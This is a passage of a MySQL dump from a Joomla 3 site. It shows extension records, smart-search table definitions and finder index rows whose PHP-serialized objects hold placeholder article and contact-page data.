00:00:00',0,0),(10139,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(10140,'plg_installer_webinstaller','plugin','webinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"18 December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.0.5\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{\"tab_position\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0); /*!40000 ALTER TABLE `fit_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_filters` -- DROP TABLE IF EXISTS `fit_finder_filters`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_filters` ( `filter_id` int(10) unsigned NOT NULL auto_increment, `title` varchar(255) NOT NULL, `alias` varchar(255) NOT NULL, `state` tinyint(1) NOT NULL default '1', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL, `created_by_alias` varchar(255) NOT NULL, `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `map_count` int(10) unsigned NOT NULL default '0', `data` text NOT NULL, `params` mediumtext, PRIMARY KEY (`filter_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_filters` -- LOCK TABLES `fit_finder_filters` WRITE; /*!40000 ALTER TABLE `fit_finder_filters` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_finder_filters` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links` -- DROP TABLE IF EXISTS `fit_finder_links`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links` ( `link_id` int(10) unsigned NOT NULL auto_increment, `url` varchar(255) NOT NULL, `route` varchar(255) NOT NULL, `title` varchar(255) default NULL, `description` varchar(255) default NULL, `indexdate` datetime NOT NULL default '0000-00-00 00:00:00', `md5sum` varchar(32) default NULL, `published` tinyint(1) NOT NULL default '1', `state` int(5) default '1', `access` int(5) default '0', `language` varchar(8) NOT NULL, `publish_start_date` datetime NOT NULL default '0000-00-00 00:00:00', `publish_end_date` datetime NOT NULL default '0000-00-00 00:00:00', `start_date` datetime NOT NULL default '0000-00-00 00:00:00', `end_date` datetime NOT NULL default '0000-00-00 00:00:00', `list_price` double unsigned NOT NULL default '0', `sale_price` double unsigned NOT NULL default '0', `type_id` int(11) NOT NULL, `object` mediumblob NOT NULL, PRIMARY KEY (`link_id`), KEY `idx_type` (`type_id`), KEY `idx_title` (`title`), KEY `idx_md5` (`md5sum`), KEY `idx_url` (`url`(75)), KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`), KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`) ) ENGINE=InnoDB AUTO_INCREMENT=135 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links` -- LOCK TABLES `fit_finder_links` WRITE; /*!40000 ALTER TABLE `fit_finder_links` DISABLE KEYS */; INSERT INTO `fit_finder_links` VALUES (2,'index.php?option=com_contact&view=contact&id=9','index.php?option=com_contact&view=contact&id=9:name&catid=81:pages&Itemid=619','Contact us - page 1','','2015-03-12 02:47:12','9a5a7b6f44dc2d0e51284194365e3989',1,1,1,'en-GB','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00',0,0,2,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:34:{s:2:\"id\";s:1:\"9\";s:5:\"alias\";s:4:\"name\";s:8:\"position\";s:8:\"Position\";s:7:\"address\";s:14:\"Street Address\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-12 06:47:11\";s:11:\"modified_by\";s:3:\"736\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";s:25:\"{\"robots\":\"\",\"rights\":\"\"}\";s:9:\"sortname1\";s:4:\"last\";s:9:\"sortname2\";s:5:\"first\";s:9:\"sortname3\";s:6:\"middle\";s:4:\"city\";s:6:\"Suburb\";s:6:\"region\";s:5:\"State\";s:7:\"country\";s:7:\"Country\";s:3:\"zip\";s:8:\"Zip Code\";s:9:\"telephone\";s:9:\"Telephone\";s:3:\"fax\";s:3:\"Fax\";s:7:\"summary\";s:0:\"\";s:5:\"email\";s:15:\"email@email.com\";s:6:\"mobile\";s:0:\"\";s:7:\"webpage\";s:0:\"\";s:8:\"ordering\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":41:{s:21:\"show_contact_category\";s:4:\"hide\";s:17:\"show_contact_list\";s:1:\"0\";s:18:\"presentation_style\";s:5:\"plain\";s:9:\"show_tags\";s:0:\"\";s:9:\"show_name\";s:1:\"0\";s:13:\"show_position\";s:1:\"0\";s:10:\"show_email\";s:1:\"0\";s:19:\"show_street_address\";s:1:\"0\";s:11:\"show_suburb\";s:1:\"0\";s:10:\"show_state\";s:1:\"0\";s:13:\"show_postcode\";s:1:\"0\";s:12:\"show_country\";s:1:\"0\";s:14:\"show_telephone\";s:1:\"0\";s:11:\"show_mobile\";s:1:\"0\";s:8:\"show_fax\";s:1:\"0\";s:12:\"show_webpage\";s:1:\"0\";s:9:\"show_misc\";s:1:\"1\";s:10:\"show_image\";s:1:\"0\";s:11:\"allow_vcard\";s:1:\"0\";s:13:\"show_articles\";s:1:\"0\";s:12:\"show_profile\";s:1:\"0\";s:10:\"show_links\";s:1:\"0\";s:10:\"linka_name\";s:7:\"Twitter\";s:5:\"linka\";s:25:\"http://twitter.com/joomla\";s:10:\"linkb_name\";s:7:\"YouTube\";s:5:\"linkb\";s:34:\"http://www.youtube.com/user/joomla\";s:10:\"linkc_name\";s:8:\"Facebook\";s:5:\"linkc\";s:30:\"http://www.facebook.com/joomla\";s:10:\"linkd_name\";s:10:\"FriendFeed\";s:5:\"linkd\";s:28:\"http://friendfeed.com/joomla\";s:10:\"linke_name\";s:7:\"Scribed\";s:5:\"linke\";s:47:\"http://www.scribd.com/people/view/504592-joomla\";s:14:\"contact_layout\";s:0:\"\";s:15:\"show_email_form\";s:0:\"\";s:15:\"show_email_copy\";s:0:\"\";s:12:\"banned_email\";s:0:\"\";s:14:\"banned_subject\";s:0:\"\";s:11:\"banned_text\";s:0:\"\";s:16:\"validate_session\";s:0:\"\";s:12:\"custom_reply\";s:0:\"\";s:8:\"redirect\";s:0:\"\";}}s:5:\"catid\";s:2:\"81\";s:8:\"category\";s:5:\"Pages\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:6:\"9:name\";s:7:\"catslug\";s:8:\"81:pages\";s:4:\"name\";N;s:6:\"layout\";s:7:\"contact\";s:4:\"path\";s:46:\"index.php/contact-page/contact/81-pages/9-name\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:4:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"user\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:5:{s:4:\"Type\";a:1:{s:7:\"Contact\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Contact\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:5:\"Pages\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Pages\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Region\";a:1:{s:5:\"State\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"State\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:7:\"Country\";a:1:{s:7:\"Country\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Country\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:46:\"index.php?option=com_contact&view=contact&id=9\";s:5:\"route\";s:77:\"index.php?option=com_contact&view=contact&id=9:name&catid=81:pages&Itemid=619\";s:5:\"title\";s:19:\"Contact us - page 1\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";s:1:\"1\";s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2011-01-01 00:00:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(3,'index.php?option=com_content&view=article&id=85','index.php?option=com_content&view=article&id=85:meet-the-team&catid=79:pages&Itemid=566','Meet The Team','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce at purus quis enim sollicitudin tempus. Aliquam imperdiet elit sit amet diam hendrerit, eget rutrum mauris volutpat. Quisque semper tortor sed auctor aliquet. Sed scelerisque, tellus id pharet','2015-03-12 06:16:52','726313a3f180bda3db77733f0c31db62',1,1,1,'en-GB','2013-12-09 11:08:46','0000-00-00 00:00:00','2013-12-09 11:08:46','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"85\";s:5:\"alias\";s:13:\"meet-the-team\";s:7:\"summary\";s:711:\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce at purus quis enim sollicitudin tempus. Aliquam imperdiet elit sit amet diam hendrerit, eget rutrum mauris volutpat. Quisque semper tortor sed auctor aliquet. Sed scelerisque, tellus id pharetra lacinia, felis eros semper velit, et rhoncus metus elit sit amet lectus. Donec condimentum sit amet massa convallis adipiscing. Sed ut pharetra lectus. Ut lacinia dolor erat, eget posuere nisi consectetur ac. Duis iaculis sed elit at tincidunt. Praesent iaculis ornare enim nec tempor. Aenean sit amet tempus nunc, at varius est. Nulla porttitor placerat dolor quis blandit. Donec nec sollicitudin purus, ac faucibus magna. Etiam ut varius purus.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"79\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-12 10:16:52\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"7\";s:8:\"category\";s:5:\"Pages\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:16:\"85:meet-the-team\";s:7:\"catslug\";s:8:\"79:pages\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:55:\"index.php/pages/meet-the-team/79-pages/85-meet-the-team\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:5:\"Pages\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Pages\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=85\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=85:meet-the-team&catid=79:pages&Itemid=566\";s:5:\"title\";s:13:\"Meet The Team\";s:11:\"description\";s:704:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce at purus quis enim sollicitudin tempus. Aliquam imperdiet elit sit amet diam hendrerit, eget rutrum mauris volutpat. Quisque semper tortor sed auctor aliquet. Sed scelerisque, tellus id pharetra lacinia, felis eros semper velit, et rhoncus metus elit sit amet lectus. Donec condimentum sit amet massa convallis adipiscing. Sed ut pharetra lectus. Ut lacinia dolor erat, eget posuere nisi consectetur ac. Duis iaculis sed elit at tincidunt. Praesent iaculis ornare enim nec tempor. Aenean sit amet tempus nunc, at varius est. Nulla porttitor placerat dolor quis blandit. Donec nec sollicitudin purus, ac faucibus magna. Etiam ut varius purus.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-09 11:08:46\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-09 11:08:46\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(5,'index.php?option=com_content&view=article&id=112','index.php?option=com_content&view=article&id=112:partners&catid=14:sample-data-articles&Itemid=675','Partners','Wayne Rooney CTO Zlatan Ibrahimović Front End Engineer a Edinson Cavani Graphic Designer Radamel Falcao Intern. Developer','2015-03-12 06:18:31','157b748eb7fbad842c214bafcd76cd59',1,0,1,'en-GB','2015-03-12 10:17:39','0000-00-00 00:00:00','2015-03-12 10:17:39','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"112\";s:5:\"alias\";s:8:\"partners\";s:7:\"summary\";s:776:\"<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n<h3>Wayne Rooney</h3>\r\n<h4>CTO</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n<h3>Zlatan Ibrahimović</h3>\r\n<h4>Front End Engineer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">a\r\n<div class=\"block\"><img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n<h3>Edinson Cavani</h3>\r\n<h4>Graphic Designer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n<h3>Radamel Falcao</h3>\r\n<h4>Intern. Developer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"0000-00-00 00:00:00\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:12:\"112:partners\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:62:\"index.php/meet-the-team-2/14-sample-data-articles/112-partners\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=112\";s:5:\"route\";s:98:\"index.php?option=com_content&view=article&id=112:partners&catid=14:sample-data-articles&Itemid=675\";s:5:\"title\";s:8:\"Partners\";s:11:\"description\";s:122:\"Wayne Rooney CTO Zlatan Ibrahimović Front End Engineer a Edinson Cavani Graphic Designer Radamel Falcao Intern. Developer\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-03-12 10:17:39\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-03-12 10:17:39\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(9,'index.php?option=com_content&view=article&id=24','index.php?option=com_content&view=article&id=24:joomla&catid=19:joomla&Itemid=512','Joomla!','Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and keep it simple to update and maintain. Joomla! is a flexible and powerful platform, whether you are building a small site for yourself o','2015-03-12 08:42:03','d0d19465d862a9fec32fb2cf92579538',1,1,1,'en-GB','2011-01-01 00:00:01','0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"24\";s:5:\"alias\";s:6:\"joomla\";s:7:\"summary\";s:408:\"<p>Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and keep it simple to update and maintain.</p>\r\n<p>Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"19\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:7:\"Joomla!\";s:8:\"modified\";s:19:\"2011-01-01 00:00:01\";s:11:\"modified_by\";s:2:\"42\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:1